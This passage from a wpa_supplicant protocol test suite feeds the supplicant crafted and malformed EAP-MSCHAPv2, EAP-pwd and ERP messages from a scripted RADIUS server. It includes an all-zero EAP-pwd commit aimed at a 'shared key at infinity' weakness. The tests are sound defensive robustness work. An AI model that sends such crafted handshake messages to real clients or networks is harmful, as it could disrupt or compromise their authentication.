            enc_pw = data[0:516]
            data = data[516:]
            enc_hash = data[0:16]
            data = data[16:]
            peer_challenge = data[0:16]
            data = data[16:]
            # Reserved
            data = data[8:]
            nt_response = data[0:24]
            data = data[24:]
            flags = data
            logger.info("enc_hash: " + enc_hash.encode("hex"))
            logger.info("peer_challenge: " + peer_challenge.encode("hex"))
            logger.info("nt_response: " + nt_response.encode("hex"))
            logger.info("flags: " + flags.encode("hex"))
            auth_challenge = binascii.unhexlify("00112233445566778899aabbccddeeff")
            logger.info("auth_challenge: " + auth_challenge.encode("hex"))
            auth_resp = GenerateAuthenticatorResponse("new-pw", nt_response,
                                                      peer_challenge,
                                                      auth_challenge, "user")
            payload = "S=" + auth_resp.encode('hex').upper()
            logger.info("Success message payload: " + payload)
            return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + len(payload),
                               EAP_TYPE_MSCHAPV2,
                               3, 0, 4 + len(payload)) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Success")
            return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Failure - password expired")
            payload = 'E=648 R=1 C=00112233445566778899aabbccddeeff V=3 M=Password expired'
            return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + len(payload),
                               EAP_TYPE_MSCHAPV2,
                               4, 0, 4 + len(payload)) + payload
        idx += 1
        if ctx['num'] == idx:
            # Second password-change round (same processing as above); this
            # run uses a password hash on the station side.
            logger.info("Test: Success after password change")
            if len(req) != 591:
                logger.info("Unexpected Change-Password packet length: %s" % len(req))
                return None
            data = req[9:]
            enc_pw = data[0:516]
            data = data[516:]
            enc_hash = data[0:16]
            data = data[16:]
            peer_challenge = data[0:16]
            data = data[16:]
            # Reserved
            data = data[8:]
            nt_response = data[0:24]
            data = data[24:]
            flags = data
            logger.info("enc_hash: " + enc_hash.encode("hex"))
            logger.info("peer_challenge: " + peer_challenge.encode("hex"))
            logger.info("nt_response: " + nt_response.encode("hex"))
            logger.info("flags: " + flags.encode("hex"))
            auth_challenge = binascii.unhexlify("00112233445566778899aabbccddeeff")
            logger.info("auth_challenge: " + auth_challenge.encode("hex"))
            auth_resp = GenerateAuthenticatorResponse("new-pw", nt_response,
                                                      peer_challenge,
                                                      auth_challenge, "user")
            payload = "S=" + auth_resp.encode('hex').upper()
            logger.info("Success message payload: " + payload)
            return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + len(payload),
                               EAP_TYPE_MSCHAPV2,
                               3, 0, 4 + len(payload)) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Success")
            return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge")
            return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + 1 + 16 + 6,
                               EAP_TYPE_MSCHAPV2,
                               1, 0, 4 + 1 + 16 + 6, 16) + 16*'A' + 'foobar'
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Failure - authentication failure")
            payload = 'E=691 R=1 C=00112233445566778899aabbccddeeff V=3 M=Authentication failed'
            return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + len(payload),
                               EAP_TYPE_MSCHAPV2,
                               4, 0, 4 + len(payload)) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge")
            return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + 1 + 16 + 6,
                               EAP_TYPE_MSCHAPV2,
                               1, 0, 4 + 1 + 16 + 6, 16) + 16*'A' + 'foobar'
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Failure - authentication failure")
            payload = 'E=691 R=1 C=00112233445566778899aabbccddeeff V=3 M=Authentication failed (2)'
            return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + len(payload),
                               EAP_TYPE_MSCHAPV2,
                               4, 0, 4 + len(payload)) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        return None
    srv = start_radius_server(mschapv2_handler)
    try:
        hapd = start_ap(apdev[0]['ifname'])
        # Driver loop: iteration 12 uses a password hash, 14 disables
        # MSCHAPv2 retries, everything else uses a plain password. Specific
        # iterations then wait for the control-interface events the scripted
        # handler is expected to trigger (new-password prompts, password
        # change, identity/password re-requests, EAP failures).
        for i in range(0, 15):
            logger.info("RUN: %d" % i)
            if i == 12:
                dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                               eap="MSCHAPV2", identity="user",
                               password_hex="hash:8846f7eaee8fb117ad06bdd830b7586c",
                               wait_connect=False)
            elif i == 14:
                dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                               eap="MSCHAPV2", identity="user",
                               phase2="mschapv2_retry=0",
                               password="password", wait_connect=False)
            else:
                dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                               eap="MSCHAPV2", identity="user",
                               password="password", wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            if i in [ 8, 11, 12 ]:
                ev = dev[0].wait_event(["CTRL-REQ-NEW_PASSWORD"],
                                       timeout=10)
                if ev is None:
                    raise Exception("Timeout on new password request")
                id = ev.split(':')[0].split('-')[-1]
                dev[0].request("CTRL-RSP-NEW_PASSWORD-" + id + ":new-pw")
                if i in [ 11, 12 ]:
                    ev = dev[0].wait_event(["CTRL-EVENT-PASSWORD-CHANGED"],
                                           timeout=10)
                    if ev is None:
                        raise Exception("Timeout on password change")
                    ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"],
                                           timeout=10)
                    if ev is None:
                        raise Exception("Timeout on EAP success")
                else:
                    ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
                                           timeout=10)
                    if ev is None:
                        raise Exception("Timeout on EAP failure")
            if i in [ 13 ]:
                ev = dev[0].wait_event(["CTRL-REQ-IDENTITY"],
                                       timeout=10)
                if ev is None:
                    raise Exception("Timeout on identity request")
                id = ev.split(':')[0].split('-')[-1]
                dev[0].request("CTRL-RSP-IDENTITY-" + id + ":user")
                ev = dev[0].wait_event(["CTRL-REQ-PASSWORD"],
                                       timeout=10)
                if ev is None:
                    raise Exception("Timeout on password request")
                id = ev.split(':')[0].split('-')[-1]
                dev[0].request("CTRL-RSP-PASSWORD-" + id + ":password")
                # TODO: Does this work correctly?
                ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
                                       timeout=10)
                if ev is None:
                    raise Exception("Timeout on EAP failure")
            if i in [ 4, 5, 6, 7, 14 ]:
                ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
                                       timeout=10)
                if ev is None:
                    raise Exception("Timeout on EAP failure")
            else:
                time.sleep(0.05)
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected(timeout=1)
    finally:
        stop_radius_server(srv)
def test_eap_proto_mschapv2_errors(dev, apdev):
    """EAP-MSCHAPv2 protocol tests (error paths)

    Forces internal failures (via the fail_test instrumentation) during the
    password-change handling of two scripted expired-password exchanges.
    """
    check_eap_capa(dev[0], "MSCHAPV2")
    # Handler scripts two identical rounds: a password-expired Failure
    # followed by a (bogus) Success after password change.
    def mschapv2_handler(ctx, req):
        logger.info("mschapv2_handler - RX " + req.encode("hex"))
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] = ctx['num'] + 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256
        idx = 0
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Failure before challenge - password expired")
            payload = 'E=648 R=1 C=00112233445566778899aabbccddeeff V=3 M=Password expired'
            return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + len(payload),
                               EAP_TYPE_MSCHAPV2,
                               4, 0, 4 + len(payload)) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Success after password change")
            payload = "S=1122334455667788990011223344556677889900"
            return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + len(payload),
                               EAP_TYPE_MSCHAPV2,
                               3, 0, 4 + len(payload)) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Failure before challenge - password expired")
            payload = 'E=648 R=1 C=00112233445566778899aabbccddeeff V=3 M=Password expired'
            return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + len(payload),
                               EAP_TYPE_MSCHAPV2,
                               4, 0, 4 + len(payload)) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Success after password change")
            payload = "S=1122334455667788990011223344556677889900"
            return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + len(payload),
                               EAP_TYPE_MSCHAPV2,
                               3, 0, 4 + len(payload)) + payload
        return None
    srv = start_radius_server(mschapv2_handler)
    try:
        hapd = start_ap(apdev[0]['ifname'])
        # Round 1: force a failure inside eap_mschapv2_change_password().
        with fail_test(dev[0], 1, "eap_mschapv2_change_password"):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="MSCHAPV2", identity="user",
                           password="password", wait_connect=False)
            ev = dev[0].wait_event(["CTRL-REQ-NEW_PASSWORD"], timeout=10)
            if ev is None:
                raise Exception("Timeout on new password request")
            id = ev.split(':')[0].split('-')[-1]
            dev[0].request("CTRL-RSP-NEW_PASSWORD-" + id + ":new-pw")
            wait_fail_trigger(dev[0], "GET_FAIL")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected(timeout=1)
        # Round 2: force get_master_key() to fail within the same path.
        with fail_test(dev[0], 1, "get_master_key;eap_mschapv2_change_password"):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="MSCHAPV2", identity="user",
                           password="password", wait_connect=False)
            ev = dev[0].wait_event(["CTRL-REQ-NEW_PASSWORD"], timeout=10)
            if ev is None:
                raise Exception("Timeout on new password request")
            id = ev.split(':')[0].split('-')[-1]
            dev[0].request("CTRL-RSP-NEW_PASSWORD-" + id + ":new-pw")
            wait_fail_trigger(dev[0], "GET_FAIL")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected(timeout=1)
    finally:
        stop_radius_server(srv)
def test_eap_proto_pwd(dev, apdev):
    """EAP-pwd protocol tests

    Runs the EAP-pwd peer through malformed fragments, invalid id/commit/
    confirm exchanges, and a few valid exchanges. Module-level globals are
    used to synchronize the RADIUS handler thread with the driver loop:
    eap_proto_pwd_test_done ends the loop, eap_proto_pwd_test_wait tells the
    driver to give the multi-message exchange time to continue before
    tearing the network down.
    """
    check_eap_capa(dev[0], "PWD")
    global eap_proto_pwd_test_done, eap_proto_pwd_test_wait
    eap_proto_pwd_test_done = False
    eap_proto_pwd_test_wait = False
    def pwd_handler(ctx, req):
        logger.info("pwd_handler - RX " + req.encode("hex"))
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] = ctx['num'] + 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256
        idx = 0
        # Cases that send the first message of a multi-message exchange set
        # eap_proto_pwd_test_wait so the driver loop waits before teardown.
        global eap_proto_pwd_test_wait
        eap_proto_pwd_test_wait = False
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing payload")
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'], 4 + 1,
                               EAP_TYPE_PWD)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing Total-Length field")
            payload = struct.pack("B", 0x80)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too large Total-Length")
            payload = struct.pack(">BH", 0x80, 65535)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            eap_proto_pwd_test_wait = True
            logger.info("Test: First fragment")
            payload = struct.pack(">BH", 0xc0, 10)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected Total-Length value in the second fragment")
            payload = struct.pack(">BH", 0x80, 0)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: First and only fragment")
            payload = struct.pack(">BH", 0x80, 0)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: First and only fragment with extra data")
            payload = struct.pack(">BHB", 0x80, 0, 0)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            eap_proto_pwd_test_wait = True
            logger.info("Test: First fragment")
            payload = struct.pack(">BHB", 0xc0, 2, 1)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Extra data in the second fragment")
            payload = struct.pack(">BBB", 0x0, 2, 3)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too short id exchange")
            payload = struct.pack(">B", 0x01)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unsupported rand func in id exchange")
            payload = struct.pack(">BHBBLB", 0x01, 0, 0, 0, 0, 0)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unsupported prf in id exchange")
            payload = struct.pack(">BHBBLB", 0x01, 19, 1, 0, 0, 0)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unsupported password pre-processing technique in id exchange")
            payload = struct.pack(">BHBBLB", 0x01, 19, 1, 1, 0, 255)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            eap_proto_pwd_test_wait = True
            logger.info("Test: Valid id exchange")
            payload = struct.pack(">BHBBLB", 0x01, 19, 1, 1, 0, 0)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected id exchange")
            payload = struct.pack(">BHBBLB", 0x01, 19, 1, 1, 0, 0)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected commit exchange")
            payload = struct.pack(">B", 0x02)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            eap_proto_pwd_test_wait = True
            logger.info("Test: Valid id exchange")
            payload = struct.pack(">BHBBLB", 0x01, 19, 1, 1, 0, 0)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected Commit payload length")
            payload = struct.pack(">B", 0x02)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            eap_proto_pwd_test_wait = True
            logger.info("Test: Valid id exchange")
            payload = struct.pack(">BHBBLB", 0x01, 19, 1, 1, 0, 0)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Commit payload with all zeros values --> Shared key at infinity")
            payload = struct.pack(">B", 0x02) + 96*'\0'
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            eap_proto_pwd_test_wait = True
            logger.info("Test: Valid id exchange")
            payload = struct.pack(">BHBBLB", 0x01, 19, 1, 1, 0, 0)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            eap_proto_pwd_test_wait = True
            logger.info("Test: Commit payload with valid values")
            element = binascii.unhexlify("8dcab2862c5396839a6bac0c689ff03d962863108e7c275bbf1d6eedf634ee832a214db99f0d0a1a6317733eecdd97f0fc4cda19f57e1bb9bb9c8dcf8c60ba6f")
            scalar = binascii.unhexlify("450f31e058cf2ac2636a5d6e2b3c70b1fcc301957f0716e77f13aa69f9a2e5bd")
            payload = struct.pack(">B", 0x02) + element + scalar
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected Confirm payload length 0")
            payload = struct.pack(">B", 0x03)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            eap_proto_pwd_test_wait = True
            logger.info("Test: Valid id exchange")
            payload = struct.pack(">BHBBLB", 0x01, 19, 1, 1, 0, 0)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            eap_proto_pwd_test_wait = True
            logger.info("Test: Commit payload with valid values")
            element = binascii.unhexlify("8dcab2862c5396839a6bac0c689ff03d962863108e7c275bbf1d6eedf634ee832a214db99f0d0a1a6317733eecdd97f0fc4cda19f57e1bb9bb9c8dcf8c60ba6f")
            scalar = binascii.unhexlify("450f31e058cf2ac2636a5d6e2b3c70b1fcc301957f0716e77f13aa69f9a2e5bd")
            payload = struct.pack(">B", 0x02) + element + scalar
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Confirm payload with incorrect value")
            payload = struct.pack(">B", 0x03) + 32*'\0'
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected confirm exchange")
            payload = struct.pack(">B", 0x03)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        logger.info("No more test responses available - test case completed")
        global eap_proto_pwd_test_done
        eap_proto_pwd_test_done = True
        return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
    srv = start_radius_server(pwd_handler)
    try:
        hapd = start_ap(apdev[0]['ifname'])
        i = 0
        # Keep reconnecting until the handler signals it has exhausted its
        # scripted responses.
        while not eap_proto_pwd_test_done:
            i += 1
            logger.info("Running connection iteration %d" % i)
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="PWD", identity="pwd user",
                           password="secret password",
                           wait_connect=False)
            # Wait for either method negotiation or a completed failure
            # status before proceeding.
            ok = False
            for j in range(5):
                ev = dev[0].wait_event(["CTRL-EVENT-EAP-STATUS",
                                        "CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                       timeout=5)
                if ev is None:
                    raise Exception("Timeout on EAP start")
                if "CTRL-EVENT-EAP-PROPOSED-METHOD" in ev:
                    ok = True
                    break
                if "CTRL-EVENT-EAP-STATUS" in ev and "status='completion' parameter='failure'" in ev:
                    ok = True
                    break
            if not ok:
                raise Exception("Expected EAP event not seen")
            # Give a multi-message exchange up to 1 s to finish before
            # tearing the network down.
            if eap_proto_pwd_test_wait:
                for k in range(10):
                    time.sleep(0.1)
                    if not eap_proto_pwd_test_wait:
                        break
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected(timeout=1)
            dev[0].dump_monitor()
    finally:
        stop_radius_server(srv)
def test_eap_proto_pwd_errors(dev, apdev):
    """EAP-pwd local error cases

    Injects allocation failures (via alloc_fail) into each step of the
    EAP-pwd client implementation and also exercises the "no password
    configured" path. Refactored with local helpers to remove the
    copy-pasted connect/wait/poll/cleanup stanzas; behavior and error
    messages are unchanged.
    """
    check_eap_capa(dev[0], "PWD")
    params = hostapd.wpa2_eap_params(ssid="eap-test")
    hapd = hostapd.add_ap(apdev[0]['ifname'], params)

    def _connect(wait_connect=False, password="secret password"):
        # Start an EAP-pwd attempt; password=None omits the password to
        # trigger the unconfigured-password code path.
        args = dict(key_mgmt="WPA-EAP", scan_freq="2412",
                    eap="PWD", identity="pwd user",
                    wait_connect=wait_connect)
        if password is not None:
            args['password'] = password
        dev[0].connect("eap-test", **args)

    def _wait_eap_proposed():
        # EAP method negotiation must at least begin
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                               timeout=15)
        if ev is None:
            raise Exception("Timeout on EAP start")

    def _wait_alloc_fail_hit():
        # Poll until the queued allocation failure has been consumed
        for j in range(10):
            state = dev[0].request('GET_ALLOC_FAIL')
            if state.startswith('0:'):
                return
            time.sleep(0.1)
        raise Exception("No allocation failure seen")

    def _cleanup():
        dev[0].request("REMOVE_NETWORK all")
        dev[0].wait_disconnected()

    # Allocation failures during method initialization
    for i in range(1, 4):
        with alloc_fail(dev[0], i, "eap_pwd_init"):
            _connect()
            ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            _cleanup()

    # Session-Id derivation failure does not prevent the connection
    with alloc_fail(dev[0], 1, "eap_pwd_get_session_id"):
        _connect(wait_connect=True)
        _cleanup()

    # Allocation failures in the protocol exchange steps; the third tuple
    # member tells whether to verify that the injected failure was consumed.
    exchange_fails = [("eap_pwd_perform_id_exchange", 6, True),
                      ("wpabuf_alloc;eap_pwd_perform_id_exchange", 1, False),
                      ("eap_pwd_perform_commit_exchange", 3, True),
                      ("eap_pwd_perform_confirm_exchange", 11, True),
                      ("eap_msg_alloc;=eap_pwd_process", 3, True)]
    for func, count, check_fail in exchange_fails:
        for i in range(1, count + 1):
            with alloc_fail(dev[0], i, func):
                _connect()
                _wait_eap_proposed()
                if check_fail:
                    _wait_alloc_fail_hit()
                _cleanup()

    # No password configured
    _connect(password=None)
    ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=52"],
                           timeout=15)
    if ev is None:
        raise Exception("EAP-pwd not started")
    _cleanup()
def test_eap_proto_erp(dev, apdev):
    """ERP protocol tests

    Drives wpa_supplicant's ERP (EAP Re-authentication Protocol, RFC 6696)
    parser with a sequence of malformed EAP-Initiate/Finish messages served
    by a scripted RADIUS handler; one message per connection attempt.
    """
    check_erp_capa(dev[0])
    global eap_proto_erp_test_done
    eap_proto_erp_test_done = False

    def erp_handler(ctx, req):
        # ctx persists across calls; ctx['num'] counts attempts and selects
        # which crafted message to return this time.
        logger.info("erp_handler - RX " + req.encode("hex"))
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] += 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256
        idx = 0

        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing type")
            return struct.pack(">BBH", EAP_CODE_INITIATE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected type")
            return struct.pack(">BBHB", EAP_CODE_INITIATE, ctx['id'], 4 + 1,
                               255)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing Reserved field")
            return struct.pack(">BBHB", EAP_CODE_INITIATE, ctx['id'], 4 + 1,
                               EAP_ERP_TYPE_REAUTH_START)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Zero-length TVs/TLVs")
            payload = ""
            return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
                               4 + 1 + 1 + len(payload),
                               EAP_ERP_TYPE_REAUTH_START, 0) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too short TLV")
            # 191 is in the TLV range; length octet missing
            payload = struct.pack("B", 191)
            return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
                               4 + 1 + 1 + len(payload),
                               EAP_ERP_TYPE_REAUTH_START, 0) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Truncated TLV")
            payload = struct.pack("BB", 191, 1)
            return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
                               4 + 1 + 1 + len(payload),
                               EAP_ERP_TYPE_REAUTH_START, 0) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Ignored unknown TLV and unknown TV/TLV terminating parsing")
            payload = struct.pack("BBB", 191, 0, 192)
            return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
                               4 + 1 + 1 + len(payload),
                               EAP_ERP_TYPE_REAUTH_START, 0) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: More than one keyName-NAI")
            payload = struct.pack("BBBB", EAP_ERP_TLV_KEYNAME_NAI, 0,
                                  EAP_ERP_TLV_KEYNAME_NAI, 0)
            return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
                               4 + 1 + 1 + len(payload),
                               EAP_ERP_TYPE_REAUTH_START, 0) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too short TLV keyName-NAI")
            payload = struct.pack("B", EAP_ERP_TLV_KEYNAME_NAI)
            return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
                               4 + 1 + 1 + len(payload),
                               EAP_ERP_TYPE_REAUTH_START, 0) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Truncated TLV keyName-NAI")
            payload = struct.pack("BB", EAP_ERP_TLV_KEYNAME_NAI, 1)
            return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
                               4 + 1 + 1 + len(payload),
                               EAP_ERP_TYPE_REAUTH_START, 0) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid rRK lifetime TV followed by too short rMSK lifetime TV")
            payload = struct.pack(">BLBH", EAP_ERP_TV_RRK_LIFETIME, 0,
                                  EAP_ERP_TV_RMSK_LIFETIME, 0)
            return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
                               4 + 1 + 1 + len(payload),
                               EAP_ERP_TYPE_REAUTH_START, 0) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing type (Finish)")
            return struct.pack(">BBH", EAP_CODE_FINISH, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected type (Finish)")
            return struct.pack(">BBHB", EAP_CODE_FINISH, ctx['id'], 4 + 1,
                               255)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing fields (Finish)")
            return struct.pack(">BBHB", EAP_CODE_FINISH, ctx['id'], 4 + 1,
                               EAP_ERP_TYPE_REAUTH)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected SEQ (Finish)")
            return struct.pack(">BBHBBHB", EAP_CODE_FINISH, ctx['id'],
                               4 + 1 + 4,
                               EAP_ERP_TYPE_REAUTH, 0, 0xffff, 0)

        # All crafted messages used up: signal the driver loop to stop.
        logger.info("No more test responses available - test case completed")
        global eap_proto_erp_test_done
        eap_proto_erp_test_done = True
        return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)

    srv = start_radius_server(erp_handler)
    try:
        hapd = start_ap(apdev[0]['ifname'])
        i = 0
        while not eap_proto_erp_test_done:
            i += 1
            logger.info("Running connection iteration %d" % i)
            # EAP-PAX is only the vehicle; the scripted ERP messages from
            # erp_handler are what is being tested.
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="PAX", identity="pax.user@example.com",
                           password_hex="0123456789abcdef0123456789abcdef",
                           wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
            if ev is None:
                raise Exception("Timeout on EAP start")
            time.sleep(0.1)
            dev[0].request("REMOVE_NETWORK all")
